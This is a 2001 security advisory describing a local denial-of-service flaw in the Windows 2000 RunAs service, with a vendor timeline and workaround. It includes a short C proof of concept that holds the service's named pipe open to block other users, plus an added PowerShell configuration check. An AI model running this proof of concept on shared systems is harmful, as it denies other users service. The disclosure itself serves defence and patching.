From: Steve (steve@securesolutions.org)
Date: Mon Nov 12 2001 - 20:28:35 CST

    Team RADIX Research Report: RADIX1112200103

    Date Published: 11-12-2001
    Research Report ID: RADIX1112200103
    Bugtraq ID: 3291
    CVE CAN: N/A
    Title: Denial of Service Vulnerability in Windows 2000 RunAs Service
    Class: Denial of Service
    Remotely Exploitable: No
    Locally Exploitable: Yes

    Vulnerability Description:
    The Windows 2000 RunAs service allows a user to launch an application in
    a security context based upon a supplied set of credentials. The
    vulnerability discovered effectively disables the functionality of the
    RunAs service.

    Vulnerable Systems: Microsoft Windows 2000

    Solution/Vendor Information/Workaround:
    The vendor has decided to include the fix within service pack 3 (SP3).

    According to the vendor, "In February 2002, we will release Windows 2000
    Service Pack 3 (SP3)".

    http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp

    When service pack 3 is released, Camisade recommends installing it.

    In the meantime, do not use the RunAs service. If the RunAs service is
    not used, a denial of service attack (as depicted here) will not have an
    impact on functionality. The denial of service attack depicted does not
    actually cause RunAs to shut down; it only renders RunAs unusable.
    Therefore, this denial of service attack cannot be leveraged for the
    RADIX1112200101 vulnerability, which relies on RunAs being disabled.
    However, do not disable the RunAs service. The RADIX1112200101
    vulnerability can only be exploited if the RunAs service is not running:
    in that case the attacker performs a man in the middle attack using a
    malicious RunAs service.

    Summary: Ensure the RunAs service is in its default setting
    (automatically started and running). The default install of the service,
    unused and not set to manual (or disabled), is the safest configuration
    until service pack 3 is released. As a temporary solution, do not use any
    utilities that leverage the RunAs service. This includes the RunAs
    command line utility and Explorer's RunAs functionality.
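The following PowerShell check is an added example and is not part of the Camisade advisory. It verifies the posture the Summary recommends (RunAs service set to automatic start and currently running, with its named pipe present) without ever opening the pipe itself, since the advisory shows that merely connecting to the pipe is enough to block the service. It assumes the service's short name is "seclogon" (Secondary Logon), which the advisory does not state, and assumes a host with Get-CimInstance (PowerShell 3 or later).

```powershell
# Added example, not part of the Camisade advisory.
# Checks the posture the advisory's Summary recommends for the RunAs service:
# start type Automatic and currently running, with its named pipe present.
# Assumes the service short name "seclogon" (Secondary Logon), which the
# advisory itself does not state.
function Test-RunAsServicePosture {
    [CmdletBinding()]
    param(
        [string]$ServiceName = 'seclogon',
        [string]$PipeName    = 'secondarylogon'
    )

    $findings  = @()
    $startMode = $null
    $state     = $null

    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) {
        $findings += "service '$ServiceName' not found"
    }
    else {
        # Win32_Service reports StartMode as Auto, Manual or Disabled.
        $startMode = $svc.StartMode
        $state     = $svc.State
        if ($startMode -ne 'Auto') {
            $findings += "start mode is '$startMode', expected 'Auto'"
        }
        if ($state -ne 'Running') {
            $findings += "state is '$state', expected 'Running'"
        }
    }

    # Enumerate the named-pipe namespace instead of opening the pipe: merely
    # connecting to \\.\pipe\secondarylogon is what blocks the service, so a
    # health check must never do that. Directory enumeration does not connect.
    $pipes = [System.IO.Directory]::GetFiles('\\.\pipe\') | ForEach-Object {
        [System.IO.Path]::GetFileName($_)
    }
    $pipePresent = $pipes -contains $PipeName
    if ($state -eq 'Running' -and -not $pipePresent) {
        $findings += "service is running but pipe '$PipeName' is not present"
    }

    [pscustomobject]@{
        Service     = $ServiceName
        StartMode   = $startMode
        State       = $state
        PipePresent = $pipePresent
        Compliant   = ($findings.Count -eq 0)
        Findings    = $findings
    }
}

# Run the check and print the result; exit non-zero so a scheduled job or
# monitoring agent can alert on drift from the recommended configuration.
$result = Test-RunAsServicePosture
$result | Format-List
if (-not $result.Compliant) { exit 1 }
```

On hosts without Get-CimInstance, Get-WmiObject -Class Win32_Service -Filter "Name='seclogon'" returns the same StartMode and State properties. The pipe check deliberately reads the \\.\pipe\ directory listing rather than calling CreateFile or Test-Path on the pipe, so running the check cannot itself trigger the condition the advisory describes.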

    Vendor notified on: 09-10-2001

    The vendor was notified, and confirmed receipt, approximately two months
    ago. In keeping with the Camisade Research Report Policy, the
    information has been made public to best benefit the security community
    through full disclosure.

    Credits:
    Camisade - Team RADIX (research@camisade.com) http://www.camisade.com

    This advisory was drafted with the help of the SecurityFocus.com
    Vulnerability Help Team. For more information or assistance drafting
    advisories please mail vulnhelp@securityfocus.com.

    Technical Description - Proof of Concept Code:
    Architecturally, all communication with the RunAs service is done by
    means of the named pipe "\\.\pipe\secondarylogon". Additionally, the
    Windows 2000 API CreateProcessWithLogonW leverages this communications
    channel in an effort to launch a process with a supplied set of
    credentials.

    The RunAs service was implemented to serve exactly one client at a time.
    If more than one client requests service from the RunAs service
    simultaneously, the additional clients receive the error "231: All pipe
    instances are busy".

    Consequently, it is possible for one client to simply connect to the
    pipe and never request any service. The RunAs service will wait for that
    client to either disconnect or send data, and will not process any other
    requests until that happens.

    It is possible for the attack to occur remotely; however, because of the
    DACL associated with the pipe, the only remote users capable of this
    would be members of the Administrators group.

    Given the above, the most applicable context in which this vulnerability
    could be leveraged would be that of Windows 2000 Terminal Services, where
    many local, non-administrative users share one machine.

    // radix1112200103.c - Camisade - Team RADIX - 11-12-2001
    //
    // Camisade (www.camisade.com) is not responsible for the use or
    // misuse of this proof of concept source code.

    #define WIN32_LEAN_AND_MEAN
    #define UNICODE
    #define _UNICODE

    #include <windows.h>
    #include <tchar.h>

    #include <stdio.h>
    #include <conio.h>

    // Named pipe through which all RunAs (Secondary Logon) requests travel.
    #define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")

    int main(void)
    {
       HANDLE hPipe;

       // Open a client end of the pipe. The service handles one client at a
       // time, so while this handle is held open no other request is served.
       hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, 0, NULL);
       if (hPipe == INVALID_HANDLE_VALUE)
       {
          printf("Unable to open pipe, error %lu\n", GetLastError());
          return 1;
       }

       // Hold the connection without sending any data until a key is pressed.
       printf("Connected to pipe. Press any key to disconnect.\n");
       getche();

       CloseHandle(hPipe);
       return 0;
    }

    -- 
    Team RADIX -- Camisade LLC
    http://www.camisade.com
    Application Security Innovations
    Camisade Direct: 1.800.709.1241